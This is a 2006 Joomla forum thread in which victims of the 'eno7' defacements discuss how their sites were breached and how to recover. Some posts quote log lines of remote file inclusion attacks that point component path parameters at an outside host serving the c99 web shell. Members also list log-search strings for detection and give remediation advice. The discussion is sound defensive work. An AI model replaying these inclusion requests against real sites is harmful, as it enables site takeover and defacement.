Joomla/MamboHacked Sites By eno7
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Apprentice
- Posts: 7
- Joined: Mon Aug 22, 2005 12:36 am
Joomla/MamboHacked Sites By eno7
I had a look here:
http://www.[ ** removed hacker's list (kudos) **]/component/option, ... no7/page,1
Because this person has hacked my site twice in the last 2 days. There seems to be a lot of joomla/mambo sites on the list of reported attacks of sites he's hacked and I wondered if anyone has any idea how this guy is getting in. There must be a common component, module or mambot that he's using.
Does anyone have any ideas?
http://www.[ ** removed hacker's list (kudos) **]/component/option, ... no7/page,1
Because this person has hacked my site twice in the last 2 days. There seems to be a lot of joomla/mambo sites on the list of reported attacks of sites he's hacked and I wondered if anyone has any idea how this guy is getting in. There must be a common component, module or mambot that he's using.
Does anyone have any ideas?
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Jul 10, 2006 11:57 am
Re: Joomla/MamboHacked Sites By eno7
We were also hacked by this guy ...
Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?
Regards,
Mike
Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?
Regards,
Mike
-
- Joomla! Apprentice
- Posts: 7
- Joined: Mon Aug 22, 2005 12:36 am
Re: Joomla/MamboHacked Sites By eno7
We used to have a phpBB forum but changed it to vBulletin about a year ago but there is still a phpbb component installed - my other half is the techie and he did tell me why at the weekend that we can't remove it but I can't remember why right now - I went though removing all components and modules that we don't need/use and removed them as well as updated any to the latest versions etc... and my other half has tried changing settings to make it even more secure but he still got to the site for a second time. Im just glad we take regular backups and save them elsewhere.Mike G. wrote:
We were also hacked by this guy ...
Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?
Regards,
Mike
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: Joomla/MamboHacked Sites By eno7
@Maggles,
I have sent you a Personal Message.
I have sent you a Personal Message.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Apprentice
- Posts: 7
- Joined: Mon Aug 22, 2005 12:36 am
Re: Joomla/MamboHacked Sites By eno7
Thanks, I've emailed you to the address you supplied.RobS wrote: @Maggles,
I have sent you a Personal Message.
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Joomla/MamboHacked Sites By eno7
Turk Telecom also for an attack through ext_calendar.
IP 81.215.180.206
IP 81.215.180.206
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Jul 10, 2006 11:57 am
Re: Joomla/MamboHacked Sites By eno7
The attack to our site came from 81.213.180.37, also a turkish site.
As I found in the logfiles, they used a PHP/BackDoor script infecting the site trough the phpBB download feature !!!
CAUTION! The script resides at this site: [mod edit: do not post links to viruses. link omited - ChiefGoFor] and might become active if you follow the link, my virusscanner (McAfee) was detecting it in the browser.
Regards,
Mike
As I found in the logfiles, they used a PHP/BackDoor script infecting the site trough the phpBB download feature !!!
CAUTION! The script resides at this site: [mod edit: do not post links to viruses. link omited - ChiefGoFor] and might become active if you follow the link, my virusscanner (McAfee) was detecting it in the browser.
Regards,
Mike
Last edited by ChiefGoFor on Mon Jul 10, 2006 2:25 pm, edited 1 time in total.
- LorenzoG
- Joomla! Hero
- Posts: 2983
- Joined: Fri Aug 19, 2005 8:46 am
- Location: Stockholm, Sweden
Re: Joomla/MamboHacked Sites By eno7
Warning, above link contains a trojan virus script .. as adviced by the poster
Last edited by LorenzoG on Mon Jul 10, 2006 2:23 pm, edited 1 time in total.
Industributik - http://www.industributiken.se
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Jul 10, 2006 11:57 am
Re: Joomla/MamboHacked Sites By eno7
Hmm ... but it might be helpful for other users to know what to search in their logfiles ....
So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.
Regards,
Mike
So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.
Regards,
Mike
- ChiefGoFor
- Joomla! Champion
- Posts: 5614
- Joined: Tue Sep 13, 2005 12:22 am
- Location: Omaha, Nebraska, USA
- Contact:
Re: Joomla/MamboHacked Sites By eno7
I agree with you. It was kind of a catch 22 there. Your solution for seaching for those key terms is great! Thank you for the information.Mike G. wrote:
Hmm ... but it might be helpful for other users to know what to search in their logfiles ....
So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.
Joomla! ...because open source matters
"Try to answer two questions for every one question you ask." - Me
"Try to answer two questions for every one question you ask." - Me
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: Joomla/MamboHacked Sites By eno7
Searching for "CONFIG_EXT", "mosConfig_absolute_path" and "mosConfig_live_site" will also reveal some of the recent exploit attempts.
Last edited by RobS on Tue Jul 11, 2006 1:07 am, edited 1 time in total.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
- CiPHeR
- Joomla! Intern
- Posts: 51
- Joined: Sat Oct 15, 2005 7:07 pm
- Location: Ottawa
- Contact:
Re: Joomla/MamboHacked Sites By eno7
Our site also got hacked this weekend by this same Eno7 guy - his page over writes your configuration.php file - how do we prevent this from happening again... this is a very serious issue. I am running the latest Joomla 1.0.10 and VirtueMart 1.0.6 along with SMF RC1.2. Is there some common denominator that allows this guy easy access to hack Joomla powered sites? Everything in our root folder of our site is read only, so how did this happen?
Thanks
Thanks
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net
- ChiefGoFor
- Joomla! Champion
- Posts: 5614
- Joined: Tue Sep 13, 2005 12:22 am
- Location: Omaha, Nebraska, USA
- Contact:
Re: Joomla/MamboHacked Sites By eno7
To my knowedge, this is not a "Joomla" issue. It is an issue with the components not using some key Joomla Security measures. I think your case, the culprit is SMF.
RobS knows more about it than I do, so I will let him give you a more formal answer.
RobS knows more about it than I do, so I will let him give you a more formal answer.
Joomla! ...because open source matters
"Try to answer two questions for every one question you ask." - Me
"Try to answer two questions for every one question you ask." - Me
-
- Joomla! Intern
- Posts: 57
- Joined: Fri Sep 09, 2005 5:28 am
- Contact:
Re: Joomla/MamboHacked Sites By eno7
What are the practical steps to restore the website. We've just been hacked through SMF component:
85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=[EDITED by mod for security reasons]?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......
And then what are the practical steps to prevent it from recurring
Thank you
Anna
85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=[EDITED by mod for security reasons]?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......
And then what are the practical steps to prevent it from recurring
Thank you
Anna
Last edited by infograf768 on Mon Jul 17, 2006 2:49 pm, edited 1 time in total.
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Joomla/MamboHacked Sites By eno7
Concerning SMF
http://forum.joomla.org/index.php/topic,76520.0.html
http://forum.joomla.org/index.php/topic,76520.0.html
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
-
- Joomla! Intern
- Posts: 57
- Joined: Fri Sep 09, 2005 5:28 am
- Contact:
Re: Joomla/MamboHacked Sites By eno7
Thank you
Anna
Anna
- CiPHeR
- Joomla! Intern
- Posts: 51
- Joined: Sat Oct 15, 2005 7:07 pm
- Location: Ottawa
- Contact:
Re: Joomla/MamboHacked Sites By eno7
Thanks...
One question... will that fix prevent this clown from doing this again?
One question... will that fix prevent this clown from doing this again?
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net
-
- Joomla! Apprentice
- Posts: 10
- Joined: Tue Aug 30, 2005 1:19 pm
- Location: Hamburg
Re: Joomla/MamboHacked Sites By eno7
i´d love to know that!CiPHeR wrote: One question... will that fix prevent this clown from doing this again?
anybody.. :-*
-
- Joomla! Apprentice
- Posts: 17
- Joined: Sun Jul 09, 2006 10:41 am
Re: Joomla/MamboHacked Sites By eno7
Block the IP in the .htaccess file:
deny from xxx.xxx.xxx.xxx
If it comes from the same place
Or disable the component and upgrade
deny from xxx.xxx.xxx.xxx
If it comes from the same place
Or disable the component and upgrade
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
Re: Joomla/MamboHacked Sites By eno7
That wont help since it is a dynamic IP of that provider who is known to support or at least not do anything against hackers (his name not allowed to be told in these forums otherwise you get flamed). The same computer may have another IP next time.zomertje wrote: Block the IP in the .htaccess file:
deny from xxx.xxx.xxx.xxx
You would need to ban all IP's of that provide. In case you need them PM me and I will send you the whole range.
-
- Joomla! Intern
- Posts: 57
- Joined: Fri Sep 09, 2005 5:28 am
- Contact:
Re: Joomla/MamboHacked Sites By eno7
Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.CiPHeR wrote: Thanks...
One question... will that fix prevent this clown from doing this again?
Additionally my Server Host turned global_registers to OFF as recommended.
Hope this works for you as well
Anna
- rliskey
- Joomla! Guru
- Posts: 828
- Joined: Tue Jun 06, 2006 7:41 am
- Location: California, Germany, Norway
- Contact:
Re: Joomla/MamboHacked Sites By eno7
I had 7 sites hacked by someone with the same signature. Only three of these sites were Joomla sites. They defaced the index.php file and uploaded a file called "fix.php". If they did more I haven't found it yet.
What all the hacked sites have in common is, 1) they're all at one ISP and 2) they're all using PHP/MySQL.
Seems the exploit could be seeking out ANY poor php code, whether in a Joomla component or in any other script.
If Joomla pros would like log files or other details, contact me.
I'd also appreciate some help. Rebuilding seven sites is an intimidating task, especially since the way they're getting in doesn't appear to be clear yet.
What all the hacked sites have in common is, 1) they're all at one ISP and 2) they're all using PHP/MySQL.
Seems the exploit could be seeking out ANY poor php code, whether in a Joomla component or in any other script.
If Joomla pros would like log files or other details, contact me.
I'd also appreciate some help. Rebuilding seven sites is an intimidating task, especially since the way they're getting in doesn't appear to be clear yet.
- rliskey
- Joomla! Guru
- Posts: 828
- Joined: Tue Jun 06, 2006 7:41 am
- Location: California, Germany, Norway
- Contact:
Re: Joomla/MamboHacked Sites By eno7
Following the trail...
From the log files. Is this how they got in? What might this do?
85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"
From the log files. Is this how they got in? What might this do?
85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Joomla/MamboHacked Sites By eno7
using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- CiPHeR
- Joomla! Intern
- Posts: 51
- Joined: Sat Oct 15, 2005 7:07 pm
- Location: Ottawa
- Contact:
Re: Joomla/MamboHacked Sites By eno7
I dont know why all hosts DONT have register globals=OFF!anna.y wrote:Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.CiPHeR wrote: Thanks...
One question... will that fix prevent this clown from doing this again?
Additionally my Server Host turned global_registers to OFF as recommended.
Hope this works for you as well
Anna
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: Joomla/MamboHacked Sites By eno7
register_globals is not, in itself, insecure - the problem is that globals is often relied upon by inexperienced developers who are unaware of the issues that can arise with globals if their code is not clean and secure. Because so many scripts rely on register_globals being on, hosts have been reluctant to turn them off (or keep them off if they are running PHP 4.2.0 or higher) - you can imagine the screams from customers if hosts suddenly disabled globals and people had their sites breaking all over the servers!CiPHeR wrote: I dont know why all hosts DONT have register globals=OFF!
So, if people do not report to their hosts when sites get hacked, or dont ask their hosts to turn register_globals off, hosts will sit in blissful ignorance thinking their customers are happy with the settings the way they are.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info
-
- Joomla! Intern
- Posts: 57
- Joined: Fri Sep 09, 2005 5:28 am
- Contact:
Re: Joomla/MamboHacked Sites By eno7
I got hacked through older version of com_SMF and deleting all root files and re-installing everything was NOT an option.infograf768 wrote: using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK
All I had to do in addition to adding the recommended line was check which files were removed or altered by the hacker (two) and simply get those two files from my site backup.
It was rather simple and as I said despite hundreds attempts of hacking I'm having no further problems (keeping my fingers crossed isprobably helping as well... )
Anna
-
- Joomla! Fledgling
- Posts: 3
- Joined: Wed Aug 09, 2006 8:13 am
Re: Joomla/MamboHacked Sites By eno7
How he able to alter the MYSQL db?
-
- Joomla! Intern
- Posts: 76
- Joined: Thu Sep 01, 2005 5:41 am
Re: Joomla/MamboHacked Sites By eno7
I was hacked by a turkish hacker today.rliskey wrote: Following the trail...
From the log files. Is this how they got in? What might this do?
85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"
[
Code: Select all
14-Aug-2006 07:20:22] PHP Warning: main(http://mi.verizon.net.do/carlos18/therules25.dot): failed to open stream: HTTP request failed! HTTP/1.1 404 Object Not Found
in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning: main(): Failed opening 'http://mi.verizon.net.do/carlos18/therules25.dot' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning: main(): Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 97
The man who speaks to you of sacrifice speaks of slaves and masters. And intends to be the master. --Ayn Rand
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: Joomla/MamboHacked Sites By eno7
What you are posting looks like the error log and not the raw logs.
Download and open your rawlogs in an editor to check for GET and "mosconfig" strings so as to figure exactly where they got in.
Download and open your rawlogs in an editor to check for GET and "mosconfig" strings so as to figure exactly where they got in.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group